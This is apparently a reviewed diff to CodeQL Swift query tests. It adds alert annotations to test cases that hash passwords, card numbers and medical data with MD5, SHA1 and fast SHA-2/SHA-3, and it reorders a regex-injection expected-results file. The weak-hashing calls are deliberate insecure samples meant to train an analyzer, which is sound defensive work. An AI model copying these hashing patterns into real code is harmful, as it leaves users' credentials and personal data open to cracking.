Crypto.Insecure.SHA1.hash(bufferPointer: passwd) // BAD - hash = Crypto.Insecure.SHA1.hash(data: cert) // BAD + hash = Crypto.Insecure.SHA1.hash(data: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash = Crypto.Insecure.SHA1.hash(bufferPointer: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash = Crypto.Insecure.SHA1.hash(data: cert) // BAD // $ Alert[swift/weak-sensitive-data-hashing] hash = Crypto.Insecure.SHA1.hash(data: encrypted_passwd) // GOOD (not sensitive) - hash = Crypto.Insecure.SHA1.hash(data: account_no) // BAD - hash = Crypto.Insecure.SHA1.hash(data: credit_card_no) // BAD + hash = Crypto.Insecure.SHA1.hash(data: account_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + hash = Crypto.Insecure.SHA1.hash(data: credit_card_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] - hash = Crypto.SHA256.hash(data: passwd) // BAD, not a computationally expensive hash - hash = Crypto.SHA256.hash(bufferPointer: passwd) // BAD, not a computationally expensive hash + hash = Crypto.SHA256.hash(data: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] + hash = Crypto.SHA256.hash(bufferPointer: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash = Crypto.SHA256.hash(data: cert) // GOOD, computationally expensive hash not required hash = Crypto.SHA256.hash(data: encrypted_passwd) // GOOD, not sensitive hash = Crypto.SHA256.hash(data: account_no) // GOOD, computationally expensive hash not required hash = Crypto.SHA256.hash(data: credit_card_no) // GOOD, computationally expensive hash not required - hash = Crypto.SHA384.hash(data: passwd) // BAD, not a computationally expensive hash - hash = Crypto.SHA384.hash(bufferPointer: passwd) // BAD, not a computationally expensive hash + hash = Crypto.SHA384.hash(data: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] + hash = Crypto.SHA384.hash(bufferPointer: 
passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash = Crypto.SHA384.hash(data: cert) // GOOD, computationally expensive hash not required hash = Crypto.SHA384.hash(data: encrypted_passwd) // GOOD, not sensitive hash = Crypto.SHA384.hash(data: account_no) // GOOD, computationally expensive hash not required hash = Crypto.SHA384.hash(data: credit_card_no) // GOOD, computationally expensive hash not required - hash = Crypto.SHA512.hash(data: passwd) // BAD, not a computationally expensive hash - hash = Crypto.SHA512.hash(bufferPointer: passwd) // BAD, not a computationally expensive hash + hash = Crypto.SHA512.hash(data: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] + hash = Crypto.SHA512.hash(bufferPointer: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash = Crypto.SHA512.hash(data: cert) // GOOD, computationally expensive hash not required hash = Crypto.SHA512.hash(data: encrypted_passwd) // GOOD, not sensitive hash = Crypto.SHA512.hash(data: account_no) // GOOD, computationally expensive hash not required 
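Review bot: The added expectation is appended after the existing free-text label, so each flagged line in testHashMethods now carries two markers, as in `// BAD // $ Alert[swift/weak-password-hashing]`. Once the `$ Alert[...]` annotation is what the test checks, the bare `// BAD` only repeats it and can drift from it if a line is later reclassified. I would drop the label where it adds no rationale, e.g. `hash = Crypto.Insecure.MD5.hash(data: passwd) // $ Alert[swift/weak-password-hashing]`, and keep only explanatory text such as "not a computationally expensive hash". The same doubling appears in the later hunks of this file and in testCryptoSwift.swift. testHashMethods continues past the end of this hunk.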
@@ -126,25 +126,25 @@ func testHashMethods(passwd : UnsafeRawBufferPointer, cert: String, encrypted_pa func testMD5UpdateWithData(passwd : String, cert: String, encrypted_passwd : String, account_no : String, credit_card_no : String) { var hash = Crypto.Insecure.MD5() - hash.update(data: passwd) // BAD - hash.update(data: cert) // BAD + hash.update(data: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash.update(data: cert) // BAD // $ Alert[swift/weak-sensitive-data-hashing] hash.update(data: encrypted_passwd) // GOOD (not sensitive) - hash.update(data: account_no) // BAD - hash.update(data: credit_card_no) // BAD + hash.update(data: account_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + hash.update(data: credit_card_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] } func testSHA1UpdateWithData(passwd : String, cert: String, encrypted_passwd : String, account_no : String, credit_card_no : String) { var hash = Crypto.Insecure.SHA1() - hash.update(data: passwd) // BAD - hash.update(data: cert) // BAD + hash.update(data: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash.update(data: cert) // BAD // $ Alert[swift/weak-sensitive-data-hashing] hash.update(data: encrypted_passwd) // GOOD (not sensitive) - hash.update(data: account_no) // BAD - hash.update(data: credit_card_no) // BAD + hash.update(data: account_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + hash.update(data: credit_card_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] } func testSHA256UpdateWithData(passwd : String, cert: String, encrypted_passwd : String, account_no : String, credit_card_no : String) { var hash = Crypto.SHA256() - hash.update(data: passwd) // BAD, not a computationally expensive hash + hash.update(data: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash.update(data: cert) // GOOD hash.update(data: encrypted_passwd) // GOOD (not sensitive) hash.update(data: account_no) // GOOD 
@@ -153,7 +153,7 @@ func testSHA256UpdateWithData(passwd : String, cert: String, encrypted_passwd : func testSHA384UpdateWithData(passwd : String, cert: String, encrypted_passwd : String, account_no : String, credit_card_no : String) { var hash = Crypto.SHA384() - hash.update(data: passwd) // BAD, not a computationally expensive hash + hash.update(data: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash.update(data: cert) // GOOD hash.update(data: encrypted_passwd) // GOOD (not sensitive) hash.update(data: account_no) // GOOD @@ -162,7 +162,7 @@ func testSHA384UpdateWithData(passwd : String, cert: String, encrypted_passwd : func testSHA512UpdateWithData(passwd : String, cert: String, encrypted_passwd : String, account_no : String, credit_card_no : String) { var hash = Crypto.SHA512() - hash.update(data: passwd) // BAD, not a computationally expensive hash + hash.update(data: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash.update(data: cert) // GOOD hash.update(data: encrypted_passwd) // GOOD (not sensitive) hash.update(data: account_no) // GOOD 
@@ -171,25 +171,25 @@ func testSHA512UpdateWithData(passwd : String, cert: String, encrypted_passwd : func testMD5UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, cert: UnsafeRawBufferPointer, encrypted_passwd : UnsafeRawBufferPointer, account_no : UnsafeRawBufferPointer, credit_card_no : UnsafeRawBufferPointer) { var hash = Crypto.Insecure.MD5() - hash.update(bufferPointer: passwd) // BAD - hash.update(bufferPointer: cert) // BAD + hash.update(bufferPointer: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash.update(bufferPointer: cert) // BAD // $ Alert[swift/weak-sensitive-data-hashing] hash.update(bufferPointer: encrypted_passwd) // GOOD (not sensitive) - hash.update(bufferPointer: account_no) // BAD - hash.update(bufferPointer: credit_card_no) // BAD + hash.update(bufferPointer: account_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + hash.update(bufferPointer: credit_card_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] } func testSHA1UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, cert: UnsafeRawBufferPointer, encrypted_passwd : UnsafeRawBufferPointer, account_no : UnsafeRawBufferPointer, credit_card_no : UnsafeRawBufferPointer) { var hash = Crypto.Insecure.SHA1() - hash.update(bufferPointer: passwd) // BAD - hash.update(bufferPointer: cert) // BAD + hash.update(bufferPointer: passwd) // BAD // $ Alert[swift/weak-password-hashing] + hash.update(bufferPointer: cert) // BAD // $ Alert[swift/weak-sensitive-data-hashing] hash.update(bufferPointer: encrypted_passwd) // GOOD (not sensitive) - hash.update(bufferPointer: account_no) // BAD - hash.update(bufferPointer: credit_card_no) // BAD + hash.update(bufferPointer: account_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + hash.update(bufferPointer: credit_card_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] } func testSHA256UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, cert: UnsafeRawBufferPointer, 
encrypted_passwd : UnsafeRawBufferPointer, account_no : UnsafeRawBufferPointer, credit_card_no : UnsafeRawBufferPointer) { var hash = Crypto.SHA256() - hash.update(bufferPointer: passwd) // BAD, not a computationally expensive hash + hash.update(bufferPointer: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash.update(bufferPointer: cert) // GOOD hash.update(bufferPointer: encrypted_passwd) // GOOD (not sensitive) hash.update(bufferPointer: account_no) // GOOD @@ -198,7 +198,7 @@ func testSHA256UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, func testSHA384UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, cert: UnsafeRawBufferPointer, encrypted_passwd : UnsafeRawBufferPointer, account_no : UnsafeRawBufferPointer, credit_card_no : UnsafeRawBufferPointer) { var hash = Crypto.SHA384() - hash.update(bufferPointer: passwd) // BAD, not a computationally expensive hash + hash.update(bufferPointer: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash.update(bufferPointer: cert) // GOOD hash.update(bufferPointer: encrypted_passwd) // GOOD (not sensitive) hash.update(bufferPointer: account_no) // GOOD @@ -207,7 +207,7 @@ func testSHA384UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, func testSHA512UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, cert: UnsafeRawBufferPointer, encrypted_passwd : UnsafeRawBufferPointer, account_no : UnsafeRawBufferPointer, credit_card_no : UnsafeRawBufferPointer) { var hash = Crypto.SHA512() - hash.update(bufferPointer: passwd) // BAD, not a computationally expensive hash + hash.update(bufferPointer: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash.update(bufferPointer: cert) // GOOD hash.update(bufferPointer: encrypted_passwd) // GOOD (not sensitive) hash.update(bufferPointer: account_no) // GOOD 
@@ -217,30 +217,30 @@ func testSHA512UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, func testBadExample(passwordString: String) { // this is the "bad" example from the .qhelp let passwordData = Data(passwordString.utf8) - let passwordHash = Crypto.SHA512.hash(data: passwordData) // BAD, not a computationally expensive hash + let passwordHash = Crypto.SHA512.hash(data: passwordData) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] // ... - if Crypto.SHA512.hash(data: Data(passwordString.utf8)) == passwordHash { // BAD, not a computationally expensive hash + if Crypto.SHA512.hash(data: Data(passwordString.utf8)) == passwordHash { // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] // ... } } func testWithFlowAndMetatypes(cardNumber: String) { - let value1 = Data(cardNumber.utf8); - let _digest1 = Insecure.MD5.hash(data: value1); // BAD + let value1 = Data(cardNumber.utf8); // $ Source[swift/weak-sensitive-data-hashing] + let _digest1 = Insecure.MD5.hash(data: value1); // BAD // $ Alert[swift/weak-sensitive-data-hashing] - let value2 = Data(cardNumber.utf8); + let value2 = Data(cardNumber.utf8); // $ Source[swift/weak-sensitive-data-hashing] let hasher2 = Insecure.MD5.self; // metatype - let _digest2 = hasher2.hash(data: value2); // BAD + let _digest2 = hasher2.hash(data: value2); // BAD // $ Alert[swift/weak-sensitive-data-hashing] - let value3 = Data(cardNumber.utf8); - let _digest3 = (Insecure.MD5.self).hash(data: value3); // BAD + let value3 = Data(cardNumber.utf8); // $ Source[swift/weak-sensitive-data-hashing] + let _digest3 = (Insecure.MD5.self).hash(data: value3); // BAD // $ Alert[swift/weak-sensitive-data-hashing] - let value4 = Data(cardNumber.utf8); + let value4 = Data(cardNumber.utf8); // $ Source[swift/weak-sensitive-data-hashing] testReceiver1(value: value4); - let value5 = Data(cardNumber.utf8); + let value5 = Data(cardNumber.utf8); // $ 
Source[swift/weak-sensitive-data-hashing] testReceiver2(hasher: Insecure.MD5.self, value: value5); let value6 = Data(cardNumber.utf8); @@ -248,11 +248,11 @@ func testWithFlowAndMetatypes(cardNumber: String) { } func testReceiver1(value: Data) { - let _digest = Insecure.MD5.hash(data: value); // BAD + let _digest = Insecure.MD5.hash(data: value); // BAD // $ Alert[swift/weak-sensitive-data-hashing] } func testReceiver2(hasher: Insecure.MD5.Type, value: Data) { - let _digest = hasher.hash(data: value); // BAD + let _digest = hasher.hash(data: value); // BAD // $ Alert[swift/weak-sensitive-data-hashing] } func testReceiver3(hasher: H.Type, value: Data) { diff --git a/swift/ql/test/query-tests/Security/CWE-328/testCryptoSwift.swift b/swift/ql/test/query-tests/Security/CWE-328/testCryptoSwift.swift index 15043bc15f68..661f64ba09a0 100644 --- a/swift/ql/test/query-tests/Security/CWE-328/testCryptoSwift.swift +++ b/swift/ql/test/query-tests/Security/CWE-328/testCryptoSwift.swift 
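Review bot: In testWithFlowAndMetatypes, `value1` through `value5` gain a `$ Source[swift/weak-sensitive-data-hashing]` annotation but `let value6 = Data(cardNumber.utf8);` does not, and testReceiver3 in the following hunk gets no `Alert`. If value6 reaches a weak hash through the generic `hasher: H.Type` parameter and the query is known not to follow that, the gap is better recorded than left blank, for example `// $ MISSING: Alert[swift/weak-sensitive-data-hashing]` on the hashing line in testReceiver3. That keeps the false negative visible in the test and makes the test fail when the analysis starts finding it. The use of value6 and the body of testReceiver3 are outside the visible hunks, so this is an inference from the signature.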
@@ -150,83 +150,83 @@ extension String { func testArrays(harmlessArray: Array, phoneNumberArray: Array, passwdArray: Array) { _ = MD5().calculate(for: harmlessArray) // GOOD (not sensitive) - _ = MD5().calculate(for: phoneNumberArray) // BAD - _ = MD5().calculate(for: passwdArray) // BAD + _ = MD5().calculate(for: phoneNumberArray) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = MD5().calculate(for: passwdArray) // BAD // $ Alert[swift/weak-password-hashing] _ = SHA1().calculate(for: harmlessArray) // GOOD (not sensitive) - _ = SHA1().calculate(for: phoneNumberArray) // BAD - _ = SHA1().calculate(for: passwdArray) // BAD + _ = SHA1().calculate(for: phoneNumberArray) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = SHA1().calculate(for: passwdArray) // BAD // $ Alert[swift/weak-password-hashing] _ = SHA2(variant: .sha512).calculate(for: harmlessArray) // GOOD _ = SHA2(variant: .sha512).calculate(for: phoneNumberArray) // GOOD - _ = SHA2(variant: .sha512).calculate(for: passwdArray) // BAD + _ = SHA2(variant: .sha512).calculate(for: passwdArray) // BAD // $ Alert[swift/weak-password-hashing] _ = SHA3(variant: .sha512).calculate(for: harmlessArray) // GOOD _ = SHA3(variant: .sha512).calculate(for: phoneNumberArray) // GOOD - _ = SHA3(variant: .sha512).calculate(for: passwdArray) // BAD + _ = SHA3(variant: .sha512).calculate(for: passwdArray) // BAD // $ Alert[swift/weak-password-hashing] _ = Digest.md5(harmlessArray) // GOOD (not sensitive) - _ = Digest.md5(phoneNumberArray) // BAD - _ = Digest.md5(passwdArray) // BAD + _ = Digest.md5(phoneNumberArray) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = Digest.md5(passwdArray) // BAD // $ Alert[swift/weak-password-hashing] _ = Digest.sha1(harmlessArray) // GOOD (not sensitive) - _ = Digest.sha1(phoneNumberArray) // BAD - _ = Digest.sha1(passwdArray) // BAD + _ = Digest.sha1(phoneNumberArray) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = Digest.sha1(passwdArray) // BAD // $ 
Alert[swift/weak-password-hashing] _ = Digest.sha512(harmlessArray) // GOOD (not sensitive) _ = Digest.sha512(phoneNumberArray) // GOOD - _ = Digest.sha512(passwdArray) // BAD + _ = Digest.sha512(passwdArray) // BAD // $ Alert[swift/weak-password-hashing] _ = Digest.sha2(harmlessArray, variant: .sha512) // GOOD (not sensitive) _ = Digest.sha2(phoneNumberArray, variant: .sha512) // GOOD - _ = Digest.sha2(passwdArray, variant: .sha512) // BAD + _ = Digest.sha2(passwdArray, variant: .sha512) // BAD // $ Alert[swift/weak-password-hashing] _ = Digest.sha3(harmlessArray, variant: .sha512) // GOOD (not sensitive) _ = Digest.sha3(phoneNumberArray, variant: .sha512) // GOOD - _ = Digest.sha3(passwdArray, variant: .sha512) // BAD + _ = Digest.sha3(passwdArray, variant: .sha512) // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessArray.md5() // GOOD (not sensitive) - _ = phoneNumberArray.md5() // BAD - _ = passwdArray.md5() // BAD + _ = phoneNumberArray.md5() // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = passwdArray.md5() // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessArray.sha1() // GOOD (not sensitive) - _ = phoneNumberArray.sha1() // BAD - _ = passwdArray.sha1() // BAD + _ = phoneNumberArray.sha1() // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = passwdArray.sha1() // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessArray.sha512() // GOOD _ = phoneNumberArray.sha512() // GOOD - _ = passwdArray.sha512() // BAD + _ = passwdArray.sha512() // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessArray.sha2(.sha512) // GOOD _ = phoneNumberArray.sha2(.sha512) // GOOD - _ = passwdArray.sha2(.sha512) // BAD + _ = passwdArray.sha2(.sha512) // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessArray.sha3(.sha512) // GOOD _ = phoneNumberArray.sha3(.sha512) // GOOD - _ = passwdArray.sha3(.sha512) // BAD + _ = passwdArray.sha3(.sha512) // BAD // $ Alert[swift/weak-password-hashing] } func testData(harmlessData: Data, medicalData: 
Data, passwdData: Data) { _ = harmlessData.md5() // GOOD (not sensitive) - _ = medicalData.md5() // BAD - _ = passwdData.md5() // BAD + _ = medicalData.md5() // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = passwdData.md5() // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessData.sha1() // GOOD (not sensitive) - _ = medicalData.sha1() // BAD - _ = passwdData.sha1() // BAD + _ = medicalData.sha1() // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = passwdData.sha1() // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessData.sha512() // GOOD _ = medicalData.sha512() // GOOD - _ = passwdData.sha512() // BAD + _ = passwdData.sha512() // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessData.sha2(.sha512) // GOOD _ = medicalData.sha2(.sha512) // GOOD - _ = passwdData.sha2(.sha512) // BAD + _ = passwdData.sha2(.sha512) // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessData.sha3(.sha512) // GOOD _ = medicalData.sha3(.sha512) // GOOD - _ = passwdData.sha3(.sha512) // BAD + _ = passwdData.sha3(.sha512) // BAD // $ Alert[swift/weak-password-hashing] } func testStrings(creditCardNumber: String, passwd: String) { _ = "harmless".md5() // GOOD (not sensitive) - _ = creditCardNumber.md5() // BAD - _ = passwd.md5() // BAD + _ = creditCardNumber.md5() // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = passwd.md5() // BAD // $ Alert[swift/weak-password-hashing] _ = "harmless".sha1() // GOOD (not sensitive) - _ = creditCardNumber.sha1() // BAD - _ = passwd.sha1() // BAD + _ = creditCardNumber.sha1() // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = passwd.sha1() // BAD // $ Alert[swift/weak-password-hashing] _ = "harmless".sha512() // GOOD _ = creditCardNumber.sha512() // GOOD - _ = passwd.sha512() // BAD + _ = passwd.sha512() // BAD // $ Alert[swift/weak-password-hashing] _ = "harmless".sha2(.sha512) // GOOD _ = creditCardNumber.sha2(.sha512) // GOOD - _ = passwd.sha2(.sha512) // BAD + _ = passwd.sha2(.sha512) // BAD // $ 
Alert[swift/weak-password-hashing] _ = "harmless".sha3(.sha512) // GOOD _ = creditCardNumber.sha3(.sha512) // GOOD - _ = passwd.sha3(.sha512) // BAD + _ = passwd.sha3(.sha512) // BAD // $ Alert[swift/weak-password-hashing] } diff --git a/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected b/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected index 1a26f9211971..04dafbd0b5e9 100644 --- a/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected +++ b/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected 
@@ -1,3 +1,27 @@ +#select +| tests.swift:101:16:101:16 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:101:16:101:16 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:104:16:104:40 | ... .+(_:_:) ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:104:16:104:40 | ... .+(_:_:) ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:106:16:106:16 | "..." | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:106:16:106:16 | "..." | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:109:16:109:39 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:109:16:109:39 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:110:16:110:37 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:110:16:110:37 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:113:24:113:24 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:113:24:113:24 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:114:45:114:45 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:114:45:114:45 | taintedString | This regular expression is constructed from a $@. 
| tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:120:19:120:19 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:120:19:120:19 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:126:40:126:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:126:40:126:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:131:39:131:39 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:131:39:131:39 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:137:40:137:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:137:40:137:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:144:16:144:16 | remoteInput | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:144:16:144:16 | remoteInput | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:147:39:147:39 | regexStr | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:147:39:147:39 | regexStr | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:162:17:162:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:162:17:162:17 | taintedString | This regular expression is constructed from a $@. 
| tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:164:17:164:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:164:17:164:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:167:17:167:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:167:17:167:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:170:17:170:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:170:17:170:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:173:17:173:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:173:17:173:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:176:17:176:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:176:17:176:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:179:17:179:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:179:17:179:17 | taintedString | This regular expression is constructed from a $@. 
| tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:182:17:182:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:182:17:182:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:185:17:185:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:185:17:185:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:190:21:190:21 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:190:21:190:21 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | edges | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:101:16:101:16 | taintedString | provenance | | | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:104:16:104:40 | ... .+(_:_:) ... | provenance | | 
@@ -48,27 +72,3 @@ nodes | tests.swift:185:17:185:17 | taintedString | semmle.label | taintedString | | tests.swift:190:21:190:21 | taintedString | semmle.label | taintedString | subpaths -#select -| tests.swift:101:16:101:16 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:101:16:101:16 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:104:16:104:40 | ... .+(_:_:) ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:104:16:104:40 | ... .+(_:_:) ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:106:16:106:16 | "..." | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:106:16:106:16 | "..." | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:109:16:109:39 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:109:16:109:39 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:110:16:110:37 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:110:16:110:37 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:113:24:113:24 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:113:24:113:24 | taintedString | This regular expression is constructed from a $@. 
| tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:114:45:114:45 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:114:45:114:45 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:120:19:120:19 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:120:19:120:19 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:126:40:126:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:126:40:126:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:131:39:131:39 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:131:39:131:39 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:137:40:137:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:137:40:137:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:144:16:144:16 | remoteInput | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:144:16:144:16 | remoteInput | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:147:39:147:39 | regexStr | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:147:39:147:39 | regexStr | This regular expression is constructed from a $@. 
